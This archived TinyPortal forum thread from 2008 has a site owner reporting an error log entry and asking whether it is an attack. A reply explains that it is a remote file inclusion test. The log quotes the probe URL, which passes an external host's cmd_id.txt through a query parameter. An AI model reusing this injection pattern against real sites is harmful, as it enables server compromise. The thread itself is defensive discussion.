Text only | Text with Images

TinyPortal

Development => Support => Topic started by: Bluto on October 20, 2008, 01:41:06 PM

Title: TPortal.php Hackers?
Post by: Bluto on October 20, 2008, 01:41:06 PM
Site:http://www.sbmtrader.com/index.php (http://www.sbmtrader.com/index.php)
SMF 1.1.6
TP 1.1.5
Mods:
1.  TinyPortal      1.052      
2.    Easy Edit Meta Data    1.0    
3.    SMF Trader System    1.1    
4.    SMF 1.0.14 / 1.1.6 Update    1.0    
5.    Ad Managment    2.3    ]
6.    Auto Embed Video/Audio Clips    3.1.2    
7.    Redirection Boards    2.01    
8.    Simple ImageShack    2.0.3    
9.    SMF Classifieds    1.2.9    
10. The Rules    1.06                                 
11. Activate account redirection    0.1                 
12. Integrate Lightbox

Error:
Apply Filter: Only show the error messages of this IP address  74.55.164.34    cbd08ce40e747ba54cc03a2c00b7a134
http://www.sbmtrader.com/index.php?prefix=http://linh0x.t35.com/cmd_id.txt??

8: Undefined index: 6
File: /xxxx/xxx/xxx/sbmtrader.com/Sources/TPortal.php
Line: 1574

It appears that I'm under attack. Not that that's unusual, but, is this a normal attack routine? I ask because it seamed to coincide with another support topic here: http://www.tinyportal.net/index.php/topic,26564.0.html (http://www.tinyportal.net/index.php/topic,26564.0.html)
In that topic, I had attached a zip containing my TPortal.php. I've since deleted it.
I'm wondering if there are those " hacking types" out there who are trying to harvest files from your site to use for their advantage.
Or, is this a normal attack routine and I'm just being paranoid? Or is this not even a hacking attempt?
I'm not even sure what they're trying to do. Attach their url into my files somehow?
This is not the first one, and I have banned their IP range, but we all know how far that  get's ya.
Any insight would be helpful and hopefully you'll tell me that I am in fact just being paranoid and this is nothing unusual.
I do have the .htaccess block code on the site also and ran it once as specified. From this topic: http://www.tinyportal.net/index.php/topic,13479.0.html (http://www.tinyportal.net/index.php/topic,13479.0.html)
Should this be run again at a regular interval?
Please take care of more important support issues first, I don't see any damage from this so far.
Thanks,
B-Lute
Title: Re: TPortal.php Hackers?
Post by: IchBin on October 20, 2008, 10:55:53 PM
They're doing a test to see if they can hack into your site by including a file into your code. This is a well known way that hackers try to exploit servers. If they can include a file, they can then include a script of some kind to gain access to the server and all the sites on the server. Ban the user and move on. Nothing to see here... :)
Title: Re: TPortal.php Hackers?
Post by: Bluto on October 20, 2008, 11:45:23 PM
LOL....ok folks.....everybody go home...it's over.
Text only | Text with Images